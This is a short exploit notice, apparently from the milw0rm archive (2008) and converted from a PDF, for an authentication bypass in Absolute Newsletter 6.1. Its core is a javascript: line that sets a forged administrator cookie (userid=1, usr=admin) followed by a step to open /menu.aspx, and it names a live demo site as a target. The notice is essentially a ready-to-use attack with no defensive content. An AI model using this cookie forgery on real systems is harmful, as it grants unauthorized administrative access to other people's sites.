Absolute Newsletter 6.1 Insecure Cookie Handling Vulnerability.pdf

1 −=======================================− 2 Autore: x0r 3 Cms = Absolute Newsletter 6.1 4 Bug: Insecure Cookie Handling Vulnerability 5 −=======================================− 6 7 8 Exploit: 9 javascript:document.cookie="xlaANLDEMOadmin=lvl=1&userid=1&usr=admin&s=TYPE 10 A SERIES OF RANDOM NUMBERS AND CHARACTERS HERE; path=/"; and go to 11 /menu.aspx 12 13 Live Demo: http://www.xigla.com/absolutenl/demo 14 15 [−] King Lion Gay 16 [+] Margherita Ti Amo...I’m Sorry... 17 18 _EOF_ 19 20 # milw0rm.com [2008−10−31] Page 1/1 Absolute Newsletter 6.1 Insecure Cookie Handling Vulnerability x0r 10/31/2008